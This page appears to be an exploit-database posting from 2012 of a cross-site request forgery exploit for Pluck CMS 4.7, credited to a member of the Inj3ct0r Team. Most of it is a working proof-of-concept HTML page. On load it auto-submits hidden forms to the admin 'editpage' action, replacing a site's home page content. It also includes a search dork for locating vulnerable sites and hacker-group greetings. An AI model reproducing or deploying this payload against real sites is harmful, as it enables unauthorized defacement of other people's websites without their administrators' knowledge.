Home / exploitsPDF  

Pluck 4.7 Cross Site Request Forgery

Posted on 05 April 2012

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 +---------------------------------------+ 1 0 |I'm DoSs-Dz member from Inj3ct0r Team | 1 1 +---------------------------------------+ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 +----------------------------------------------------------------------------+ # Exploit Title : pluck 4.7 CSRF edit home page # Date : 04 April 2012 # Site for Vendor : http://www.pluck-cms.org/downloads/pluck-4_7.tar.gz # Dork : powered by pluck # Big Thank to : Inj3ct0r Team & Inj3ct0r Operators "CrosS" +----------------------------------------------------------------------------+ [!1»] Exploit P0C =» <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title> Edit html page for home page by : DoSs-Dz </title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> var pauses = new Array( "95","119","253","79","89" ); function pausecomp(millis) { var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < millis);} function fireForms(){ var count = 5;var i=0; for(i=0; i<count; i++) {document.forms[i].submit(); pausecomp(pauses[i]);}} </script> <H2> Edit html page for home page by : DoSs-Dz </H2> <form method="POST" name="form0" action="http://127.0.0.1:80/xampp/1/admin.php?action=editpage"> <input type="hidden" name="title" value="Hack ing Test"/> < ---- EDit Here <input type="hidden" name="content" value="<p>Hiiiii Geysss</p>"/> < ---- EDit Here <input type="hidden" name="description" value=""/> <input type="hidden" name="keywords" value=""/> <input type="hidden" name="hidden" value="no"/> <input type="hidden" name="sub_page" value=""/> <input type="hidden" name="theme" value="default"/> <input type="hidden" name="save" value="Save"/> </form> </body> </html> +--------------------------------------------------------------------------------------------------------+ |[»] Greetz to =» [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ] | |[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ] | +--------------------------------------------------------------------------------------------------------+ +------------------------------------+ |./ Gharrdaia on : 04 april 2012 | +------------------------------------+

 

TOP